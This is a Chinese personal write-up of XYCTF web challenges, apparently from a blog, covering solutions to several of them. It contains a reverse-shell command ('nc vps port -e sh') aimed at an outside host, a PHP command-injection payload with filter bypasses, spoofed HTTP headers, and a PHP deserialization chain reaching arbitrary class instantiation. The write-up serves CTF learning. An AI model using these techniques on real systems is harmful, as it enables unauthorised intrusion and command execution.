<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="theme-color" content="#0078E7"><meta name="author" content="ta0"><meta name="copyright" content="ta0"><meta name="generator" content="Hexo 7.1.1"><meta name="theme" content="hexo-theme-yun"><title>XYCTF个人wp | ta0的小站</title><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Noto+Serif+SC:wght@900&amp;display=swap" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://fastly.jsdelivr.net/npm/star-markdown-css@0.4.1/dist/yun/yun-markdown.min.css"><link rel="stylesheet" href="https://fastly.jsdelivr.net/npm/prism-theme-vars/base.css"><script src="https://fastly.jsdelivr.net/npm/scrollreveal/dist/scrollreveal.min.js" defer></script><script>function initScrollReveal() {
  [".post-card",".markdown-body img"].forEach((target)=> {
    ScrollReveal().reveal(target);
  })
}
document.addEventListener("DOMContentLoaded", initScrollReveal);
document.addEventListener("pjax:success", initScrollReveal);
</script><link rel="icon" type="image/png" href="/myfa.ico"><link rel="mask-icon" href="/myfa.ico" color="#0078E7"><link rel="preload" href="/css/hexo-theme-yun.css" as="style"><link rel="prefetch" href="/js/sidebar.js" as="script"><link rel="preconnect" href="https://cdn.jsdelivr.net" crossorigin><link rel="preconnect" href="https://fastly.jsdelivr.net/npm/" crossorigin><script id="yun-config">
    window.Yun = {}
    window.CONFIG = {"hostname":"tao0845.github.io","root":"/","title":"做点小小记录","version":"1.10.11","mode":"auto","copycode":true,"page":{"isPost":true},"i18n":{"placeholder":"搜索...","empty":"找不到您查询的内容: ${query}","hits":"找到 ${hits} 条结果","hits_time":"找到 ${hits} 条结果（用时 ${time} 毫秒）"},"anonymous_image":"https://cdn.yunyoujun.cn/img/avatar/none.jpg","say":{"api":"https://el-bot-api.vercel.app/api/words/young"},"local_search":{"path":"/search.xml"},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"fireworks":{"colors":null},"vendors":{"host":"https://fastly.jsdelivr.net/npm/","darken":"https://fastly.jsdelivr.net/npm/darken@1.5.0"}};
  </script><link rel="stylesheet" href="/css/hexo-theme-yun.css"><script src="/js/hexo-theme-yun.js" type="module"></script><meta name="description" content="图片直接从记录的word里面导出来的有点模糊😓由于个人实力较菜加之空余时间较少，只出了这几个题流&#x2F;(ㄒoㄒ)&#x2F;~~ webezpop首先用gc机制绕过抛出异常然后构造call_user_func用end函数返回数组最后一个元素的值数组最后一组构造成systemcall_user_func($a,$d)就变成了system然后$c就可以执行命令了,复制成cat &#x2F;f*">
<meta property="og:type" content="article">
<meta property="og:title" content="XYCTF个人wp">
<meta property="og:url" content="https://tao0845.github.io/posts/545cd3ac/index.html">
<meta property="og:site_name" content="ta0的小站">
<meta property="og:description" content="图片直接从记录的word里面导出来的有点模糊😓由于个人实力较菜加之空余时间较少，只出了这几个题流&#x2F;(ㄒoㄒ)&#x2F;~~ webezpop首先用gc机制绕过抛出异常然后构造call_user_func用end函数返回数组最后一个元素的值数组最后一组构造成systemcall_user_func($a,$d)就变成了system然后$c就可以执行命令了,复制成cat &#x2F;f*">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/28/OpEJlP.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/28/OpERTb.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/28/OpEtZl.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/28/OpE4cg.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/28/OpEHOB.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/28/OpEwdr.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/28/OpGOaM.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/28/OpEL7s.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/28/OpEELK.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/28/OpEGua.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/28/OpESzS.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/28/OpE0PN.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/28/OpEclC.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/28/OpEsTL.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/28/OpEVvi.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/28/OpEYcX.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/28/OpElOt.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/28/OpE9Nx.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/28/OpEjLj.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/28/OpE2up.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/28/OpE8FU.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/28/OpEXPY.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/28/OpEu9v.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/28/OpE3Uq.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/28/OpECvc.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/28/OpGaNG.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/28/OpGoE1.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/28/OpGquI.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/28/OpGBFD.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/28/OpGTRF.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/28/OpGU96.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/28/OpGbUP.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/28/OpGkyb.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/28/OpGxdl.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/28/OpGFag.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/28/OpGheB.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/28/OpGiEs.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/28/OpGnIK.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/28/OpG7ha.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/28/OpGNRS.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/28/OpGejN.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/28/OpGAUC.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/28/OpGKyL.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/28/OpGZsi.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/28/OpGyaX.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/28/OpGget.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/28/OpGmGx.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/28/OpGpIj.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/28/OpGPhp.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/28/OpGHgq.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/28/OpGLsc.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/28/OpGGor.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/28/OpGQrM.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/28/OpGSGG.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/28/OpG031.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/28/OpGdhI.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/28/OpGstD.png">
<meta property="og:image" content="https://ooo.0x0.ooo/2024/04/28/OpGV2F.png">
<meta property="article:published_time" content="2024-04-28T05:00:46.047Z">
<meta property="article:modified_time" content="2024-06-07T05:26:52.629Z">
<meta property="article:author" content="ta0">
<meta property="article:tag" content="WEB,MISC">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://ooo.0x0.ooo/2024/04/28/OpEJlP.png"><script>(function() {
  if (CONFIG.mode !== 'auto') return
  const prefersDark = window.matchMedia && window.matchMedia('(prefers-color-scheme: dark)').matches
  const setting = localStorage.getItem('darken-mode') || 'auto'
  if (setting === 'dark' || (prefersDark && setting !== 'light'))
    document.documentElement.classList.toggle('dark', true)
})()</script></head><body><script src="https://code.iconify.design/2/2.1.1/iconify.min.js"></script><script>// Define global variable
IconifyProviders = {
  // Empty prefix: overwrite default API provider configuration
  '': {
    // Use custom API first, use Iconify public API as backup
    resources: [
        'https://api.iconify.design',
    ],
    // Wait for 1 second before switching API hosts
    rotate: 1000,
  },
};</script><script defer src="https://fastly.jsdelivr.net/npm/animejs@latest"></script><script defer src="/js/ui/fireworks.js" type="module"></script><canvas class="fireworks"></canvas><div class="container"><a class="sidebar-toggle hty-icon-button" id="menu-btn"><div class="hamburger hamburger--spin" type="button"><span class="hamburger-box"><span class="hamburger-inner"></span></span></div></a><div class="sidebar-toggle sidebar-overlay"></div><aside class="sidebar"><script src="/js/sidebar.js" type="module"></script><ul class="sidebar-nav"><li class="sidebar-nav-item sidebar-nav-toc hty-icon-button sidebar-nav-active" data-target="post-toc-wrap" title="文章目录"><span class="icon iconify" data-icon="ri:list-ordered"></span></li><li class="sidebar-nav-item sidebar-nav-overview hty-icon-button" data-target="site-overview-wrap" title="站点概览"><span class="icon iconify" data-icon="ri:passport-line"></span></li></ul><div class="sidebar-panel" id="site-overview-wrap"><div class="site-info fix-top"><a class="site-author-avatar" href="/about/" title="ta0"><img width="96" loading="lazy" src="/123.jpg" alt="ta0"></a><div class="site-author-name"><a href="/about/">ta0</a></div><span class="site-name">ta0的小站</span><sub class="site-subtitle">网安小白的成长记录</sub><div class="site-description">Learning For Fun</div></div><nav class="site-state"><a class="site-state-item hty-icon-button icon-home" href="/" title="首页"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:home-4-line"></span></span></a><div class="site-state-item"><a href="/archives/" title="归档"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:archive-line"></span></span><span class="site-state-item-count">47</span></a></div><div class="site-state-item"><a href="/categories/" title="分类"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:folder-2-line"></span></span><span class="site-state-item-count">7</span></a></div><div class="site-state-item"><a href="/tags/" title="标签"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:price-tag-3-line"></span></span><span class="site-state-item-count">61</span></a></div><a class="site-state-item hty-icon-button" target="_blank" rel="noopener" href="https://yun.yunyoujun.cn" title="文档"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:settings-line"></span></span></a></nav><hr style="margin-bottom:0.5rem"><div class="links-of-author"><a class="links-of-author-item hty-icon-button" rel="noopener" href="https://github.com/tao0845" title="GitHub" target="_blank" style="color:#6e5494"><span class="icon iconify" data-icon="ri:github-line"></span></a><a class="links-of-author-item hty-icon-button" rel="noopener" href="https://music.163.com/#/user/home?id=312924699" title="网易云音乐" target="_blank" style="color:#C20C0C"><span class="icon iconify" data-icon="ri:netease-cloud-music-line"></span></a><a class="links-of-author-item hty-icon-button" rel="noopener" href="mailto:2814928906@qq.com" title="E-Mail" target="_blank" style="color:#8E71C1"><span class="icon iconify" data-icon="ri:mail-line"></span></a></div><hr style="margin:0.5rem 1rem"><div class="links"><a class="links-item hty-icon-button" href="/links/" title="我的小伙伴们" style="color:dodgerblue"><span class="icon iconify" data-icon="ri:genderless-line"></span></a></div><br><a class="links-item hty-icon-button" id="toggle-mode-btn" href="javascript:;" title="Mode" style="color: #f1cb64"><span class="icon iconify" data-icon="ri:contrast-2-line"></span></a></div><div class="sidebar-panel sidebar-panel-active" id="post-toc-wrap"><div class="post-toc"><div class="post-toc-content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#web"><span class="toc-number">1.</span> <span class="toc-text">web</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#ezpop"><span class="toc-number">1.1.</span> <span class="toc-text">ezpop</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ezMake"><span class="toc-number">1.2.</span> <span class="toc-text">ezMake</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ez-Make"><span class="toc-number">1.3.</span> <span class="toc-text">ez?Make</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ezmd5"><span class="toc-number">1.4.</span> <span class="toc-text">ezmd5</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#warmup"><span class="toc-number">1.5.</span> <span class="toc-text">warmup</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ezhttp"><span class="toc-number">1.6.</span> <span class="toc-text">ezhttp</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%89%A2%E7%89%A2%E8%AE%B0%E4%BD%8F%EF%BC%8C%E9%80%9D%E8%80%85%E4%B8%BA%E5%A4%A7"><span class="toc-number">1.7.</span> <span class="toc-text">牢牢记住，逝者为大</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ezSerialize"><span class="toc-number">1.8.</span> <span class="toc-text">ezSerialize</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%88%91%E6%98%AF%E4%B8%80%E4%B8%AA%E5%A4%8D%E8%AF%BB%E6%9C%BA"><span class="toc-number">1.9.</span> <span class="toc-text">我是一个复读机</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ezRCE"><span class="toc-number">1.10.</span> <span class="toc-text">ezRCE</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ezClass"><span class="toc-number">1.11.</span> <span class="toc-text">ezClass</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#login"><span class="toc-number">1.12.</span> <span class="toc-text">login</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#pharme"><span class="toc-number">1.13.</span> <span class="toc-text">pharme</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Crypto"><span class="toc-number">2.</span> <span class="toc-text">Crypto</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Sign1n%E7%AD%BE%E5%88%B0"><span class="toc-number">2.1.</span> <span class="toc-text">Sign1n签到</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#MISC"><span class="toc-number">3.</span> <span class="toc-text">MISC</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%86%8A%E5%8D%9A%E5%A3%AB"><span class="toc-number">3.1.</span> <span class="toc-text">熊博士</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#game"><span class="toc-number">3.2.</span> <span class="toc-text">game</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#zzl%E7%9A%84%E6%8A%A4%E7%90%86%E5%B0%8F%E8%AF%BE%E5%A0%82"><span class="toc-number">3.3.</span> <span class="toc-text">zzl的护理小课堂</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ez%E9%9A%90%E5%86%99"><span class="toc-number">3.4.</span> <span class="toc-text">ez隐写</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ZIP%E7%A5%9E%E4%B9%8B%E5%A5%97"><span class="toc-number">3.5.</span> <span class="toc-text">ZIP神之套</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#TCPL"><span class="toc-number">3.6.</span> <span class="toc-text">TCPL</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%BD%91%E7%BB%9C%E8%BF%BD%E8%B8%AA"><span class="toc-number">3.7.</span> <span class="toc-text">网络追踪</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Osint2"><span class="toc-number">3.8.</span> <span class="toc-text">Osint2</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%BD%A9%E8%9B%8B"><span class="toc-number">3.9.</span> <span class="toc-text">彩蛋</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Osint1"><span class="toc-number">3.10.</span> <span class="toc-text">Osint1</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%9C%9F-%E7%AD%BE%E5%88%B0"><span class="toc-number">3.11.</span> <span class="toc-text">真&gt;签到</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Ez-Base1024-2"><span class="toc-number">3.12.</span> <span class="toc-text">Ez_Base1024*2</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Ez-osint"><span class="toc-number">3.13.</span> <span class="toc-text">Ez_osint</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%BE%8E%E5%A6%99%E7%9A%84%E6%AD%8C%E5%A3%B0"><span class="toc-number">3.14.</span> <span class="toc-text">美妙的歌声</span></a></li></ol></li></ol></div></div></div></aside><main class="sidebar-translate" id="content"><div id="post"><article class="hty-card post-block" itemscope itemtype="https://schema.org/Article" style="--smc-primary:#0078E7;"><link itemprop="mainEntityOfPage" href="https://tao0845.github.io/posts/545cd3ac/"><span hidden itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="ta0"><meta itemprop="description"></span><span hidden itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><meta itemprop="name" content="ta0的小站"></span><header class="post-header"><h1 class="post-title" itemprop="name headline">XYCTF个人wp</h1><div class="post-meta"><div class="post-time" style="display:block"><span class="post-meta-item-icon"><span class="icon iconify" data-icon="ri:calendar-line"></span></span> <time title="创建时间：2024-04-28 13:00:46" itemprop="dateCreated datePublished" datetime="2024-04-28T13:00:46+08:00">2024-04-28</time><span class="post-meta-divider">-</span><span class="post-meta-item-icon"><span class="icon iconify" data-icon="ri:calendar-2-line"></span></span> <time title="修改时间：2024-06-07 13:26:52" itemprop="dateModified" datetime="2024-06-07T13:26:52+08:00">2024-06-07</time></div><span class="post-count"><span class="post-symbolcount"><span class="post-meta-item-icon" title="本文字数"><span class="icon iconify" data-icon="ri:file-word-line"></span></span> <span title="本文字数">1.7k</span><span class="post-meta-divider">-</span><span class="post-meta-item-icon" title="阅读时长"><span class="icon iconify" data-icon="ri:timer-line"></span></span> <span title="阅读时长">7m</span></span></span><span class="post-busuanzi"><span class="post-meta-divider">-</span><span class="post-meta-item-icon" title="阅读次数"><span class="icon iconify" data-icon="ri:eye-line"></span> <span id="busuanzi_value_page_pv"></span></span></span><div class="post-classify"><span class="post-category"> <span class="post-meta-item-icon" style="margin-right:3px;"><span class="icon iconify" data-icon="ri:folder-line"></span></span><span itemprop="about" itemscope itemtype="https://schema.org/Thing"><a class="category-item" href="/categories/CTF/" style="--text-color:var(--hty-text-color)" itemprop="url" rel="index"><span itemprop="text">CTF</span></a></span></span><span class="post-tag"><span class="post-meta-divider">-</span><a class="tag-item" href="/tags/WEB-MISC/" style="--text-color:var(--hty-text-color)"><span class="post-meta-item-icon"><span class="icon iconify" data-icon="ri:price-tag-3-line"></span></span><span class="tag-name">WEB,MISC</span></a></span></div></div></header><section class="post-body" itemprop="articleBody"><div class="post-content markdown-body"><p>图片直接从记录的word里面导出来的有点模糊😓<br>由于个人实力较菜加之空余时间较少，只出了这几个题流&#x2F;(ㄒoㄒ)&#x2F;~~</p>
<h1 id="web"><a href="#web" class="headerlink" title="web"></a>web</h1><h2 id="ezpop"><a href="#ezpop" class="headerlink" title="ezpop"></a>ezpop</h2><p>首先用gc机制绕过抛出异常然后构造<code>call_user_func</code><br>用<code>end</code>函数返回数组最后一个元素的值<br>数组最后一组构造成system<br><code>call_user_func($a,$d)</code>就变成了system<br>然后$c就可以执行命令了,复制成cat &#x2F;f*<br><code>$d</code>给个空值<br><img src="https://ooo.0x0.ooo/2024/04/28/OpEJlP.png" alt="OpEJlP.png" loading="lazy"><br>注意修改属性大小<br><img src="https://ooo.0x0.ooo/2024/04/28/OpERTb.png" alt="OpERTb.png" loading="lazy"></p>
<h2 id="ezMake"><a href="#ezMake" class="headerlink" title="ezMake"></a>ezMake</h2><p>输入help发现有个source指令，可以用来读取文件<br><img src="https://ooo.0x0.ooo/2024/04/28/OpEtZl.png" alt="OpEtZl.png" loading="lazy"><br>直接 <code>source f*</code>读取flag<br><img src="https://ooo.0x0.ooo/2024/04/28/OpE4cg.png" alt="OpE4cg.png" loading="lazy"></p>
<h2 id="ez-Make"><a href="#ez-Make" class="headerlink" title="ez?Make"></a>ez?Make</h2><p>测试发现nc没被ban,直接nc vps port -e sh拿到shell<br><img src="https://ooo.0x0.ooo/2024/04/28/OpEHOB.png" alt="OpEHOB.png" loading="lazy"></p>
<h2 id="ezmd5"><a href="#ezmd5" class="headerlink" title="ezmd5"></a>ezmd5</h2><p>直接搜两个md5值相同的文件<br>搜到一个网站<br><a target="_blank" rel="noopener" href="https://natmchugh.blogspot.com/2014/10/how-i-created-two-images-with-same-md5.html">https://natmchugh.blogspot.com/2014/10/how-i-created-two-images-with-same-md5.html</a><br>将两个文件上传即可</p>
<h2 id="warmup"><a href="#warmup" class="headerlink" title="warmup"></a>warmup</h2><p>第一步简单绕过<br><img src="https://ooo.0x0.ooo/2024/04/28/OpEwdr.png" alt="OpEwdr.png" loading="lazy"><br>第二步preg_replace命令执行<br><img src="https://ooo.0x0.ooo/2024/04/28/OpGOaM.png" alt="OpGOaM.png" loading="lazy"></p>
<h2 id="ezhttp"><a href="#ezhttp" class="headerlink" title="ezhttp"></a>ezhttp</h2><p>先去robots.txt<br><img src="https://ooo.0x0.ooo/2024/04/28/OpEL7s.png" alt="OpEL7s.png" loading="lazy"><br>跟随<br><img src="https://ooo.0x0.ooo/2024/04/28/OpEELK.png" alt="OpEELK.png" loading="lazy"><br>然后根据要求一一完成就行</p>
<blockquote>
<p>POST &#x2F;index.php HTTP&#x2F;1.1<br>Host: xyctf.top:42385<br>User-Agent: XYCTF<br>Accept: text&#x2F;html,application&#x2F;xhtml+xml,application&#x2F;xml;q&#x3D;0.9,image&#x2F;avif,image&#x2F;webp,<em>&#x2F;</em>;q&#x3D;0.8<br>Accept-Language: zh-CN,zh;q&#x3D;0.8,zh-TW;q&#x3D;0.7,zh-HK;q&#x3D;0.5,en-US;q&#x3D;0.3,en;q&#x3D;0.2<br>Accept-Encoding: gzip, deflate, br<br>Content-Type: application&#x2F;x-www-form-urlencoded<br>Content-Length: 48<br>Origin: <a target="_blank" rel="noopener" href="http://xyctf.top:42385/">http://xyctf.top:42385</a><br>Connection: close<br>Upgrade-Insecure-Requests: 1<br>Referer: yuanshen.com<br>Client-Ip: 127.0.0.1<br>Via: ymzx.qq.com<br>cookie: XYCTF</p>
<p>username&#x3D;XYCTF&amp;password&#x3D;%40JOILha%21wuigqi123%24</p>
</blockquote>
<h2 id="牢牢记住，逝者为大"><a href="#牢牢记住，逝者为大" class="headerlink" title="牢牢记住，逝者为大"></a>牢牢记住，逝者为大</h2><p><img src="https://ooo.0x0.ooo/2024/04/28/OpEGua.png" alt="OpEGua.png" loading="lazy"><br>想用echo 实现不了<br>用eval，先用%0d换行绕过注释符，然后用反引号执行指令缩减长度，然后%23注释后面的逗号，由于长度限制，使用$_GET再传个参,然后由于没有回显，用cp将flag传出来<br>f l a都被过滤，用<code>[@-z]</code>绕过<br>最终exp<br>cmd&#x3D;%0d<code>$_GET[1]</code>;%23&amp;1&#x3D;c\p &#x2F;[@-z][@-z][@-z]g 1<br>然后访问url&#x2F;1就能拿到flag</p>
<h2 id="ezSerialize"><a href="#ezSerialize" class="headerlink" title="ezSerialize"></a>ezSerialize</h2><p>第一关用个引用就能绕过<br><img src="https://ooo.0x0.ooo/2024/04/28/OpESzS.png" alt="OpESzS.png" loading="lazy"><br><img src="https://ooo.0x0.ooo/2024/04/28/OpE0PN.png" alt="OpE0PN.png" loading="lazy"><br>第二关也没难度,跟着构造就行<br><img src="https://ooo.0x0.ooo/2024/04/28/OpEclC.png" alt="OpEclC.png" loading="lazy"><br>第三关有个原生类利用，用php伪协议就能读取所有文件了</p>
<pre class="language-php" data-language="php"><code class="language-php"> <span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token comment">// flag.php</span>
<span class="token keyword">class</span> <span class="token class-name-definition class-name">XYCTFNO1</span>
<span class="token punctuation">&#123;</span>
    <span class="token keyword">public</span> <span class="token variable">$Liu</span><span class="token punctuation">;</span>
    <span class="token keyword">public</span> <span class="token variable">$T1ng</span><span class="token operator">=</span><span class="token string single-quoted-string">'yuroandCMD258'</span><span class="token punctuation">;</span>
    <span class="token keyword">public</span> <span class="token variable">$upsw1ng</span><span class="token punctuation">;</span>
    <span class="token keyword">public</span> <span class="token variable">$crypto0</span><span class="token operator">=</span><span class="token string single-quoted-string">'dev1l'</span><span class="token punctuation">;</span>

    
<span class="token punctuation">&#125;</span>

<span class="token keyword">class</span> <span class="token class-name-definition class-name">XYCTFNO2</span>
<span class="token punctuation">&#123;</span>
    <span class="token keyword">public</span> <span class="token variable">$crypto0</span><span class="token punctuation">;</span>
    <span class="token keyword">public</span> <span class="token variable">$adwa</span><span class="token punctuation">;</span>

   

    <span class="token keyword">public</span> <span class="token keyword">function</span> <span class="token function-definition function">XYCTF</span><span class="token punctuation">(</span><span class="token punctuation">)</span>
    <span class="token punctuation">&#123;</span>
        <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token variable">$this</span><span class="token operator">-></span><span class="token property">adwa</span><span class="token operator">-></span><span class="token property">crypto0</span> <span class="token operator">!=</span> <span class="token string single-quoted-string">'dev1l'</span> <span class="token keyword">or</span> <span class="token variable">$this</span><span class="token operator">-></span><span class="token property">adwa</span><span class="token operator">-></span><span class="token property">T1ng</span> <span class="token operator">!=</span> <span class="token string single-quoted-string">'yuroandCMD258'</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
            <span class="token keyword">return</span> <span class="token constant boolean">False</span><span class="token punctuation">;</span>
        <span class="token punctuation">&#125;</span> <span class="token keyword">else</span> <span class="token punctuation">&#123;</span>
            <span class="token keyword">return</span> <span class="token constant boolean">True</span><span class="token punctuation">;</span>
        <span class="token punctuation">&#125;</span>
    <span class="token punctuation">&#125;</span>
<span class="token punctuation">&#125;</span>

<span class="token keyword">class</span> <span class="token class-name-definition class-name">XYCTFNO3</span>
<span class="token punctuation">&#123;</span>
    <span class="token keyword">public</span> <span class="token variable">$KickyMu</span><span class="token punctuation">;</span>
    <span class="token keyword">public</span> <span class="token variable">$fpclose</span><span class="token punctuation">;</span>
    <span class="token keyword">public</span> <span class="token variable">$N1ght</span> <span class="token operator">=</span> <span class="token string double-quoted-string">"oSthing"</span><span class="token punctuation">;</span>



    <span class="token keyword">public</span> <span class="token keyword">function</span> <span class="token function-definition function">XY</span><span class="token punctuation">(</span><span class="token punctuation">)</span>
    <span class="token punctuation">&#123;</span>
        <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token variable">$this</span><span class="token operator">-></span><span class="token property">N1ght</span> <span class="token operator">==</span> <span class="token string single-quoted-string">'oSthing'</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
            <span class="token keyword">echo</span> <span class="token string double-quoted-string">"WOW, You web is really good!!!\n"</span><span class="token punctuation">;</span>
            <span class="token keyword">echo</span> <span class="token keyword">new</span> <span class="token variable">$_POST</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'X'</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token variable">$_POST</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'Y'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token punctuation">&#125;</span>
    <span class="token punctuation">&#125;</span>

    <span class="token keyword">public</span> <span class="token keyword">function</span> <span class="token function-definition function">__wakeup</span><span class="token punctuation">(</span><span class="token punctuation">)</span>
    <span class="token punctuation">&#123;</span>
        <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token variable">$this</span><span class="token operator">-></span><span class="token property">KickyMu</span><span class="token operator">-></span><span class="token function">XYCTF</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
            <span class="token variable">$this</span><span class="token operator">-></span><span class="token function">XY</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token punctuation">&#125;</span>
    <span class="token punctuation">&#125;</span>
<span class="token punctuation">&#125;</span>

<span class="token variable">$a</span><span class="token operator">=</span><span class="token keyword">new</span> <span class="token class-name">XYCTFNO3</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$a</span><span class="token operator">-></span><span class="token property">KickyMu</span><span class="token operator">=</span><span class="token keyword">new</span> <span class="token class-name">XYCTFNO2</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$a</span><span class="token operator">-></span><span class="token property">KickyMu</span><span class="token operator">-></span><span class="token property">adwa</span><span class="token operator">=</span><span class="token keyword">new</span> <span class="token class-name">XYCTFNO1</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">echo</span> <span class="token function">serialize</span><span class="token punctuation">(</span><span class="token variable">$a</span><span class="token punctuation">)</span><span class="token punctuation">;</span></span></code></pre>
<p><img src="https://ooo.0x0.ooo/2024/04/28/OpEsTL.png" alt="OpEsTL.png" loading="lazy"></p>
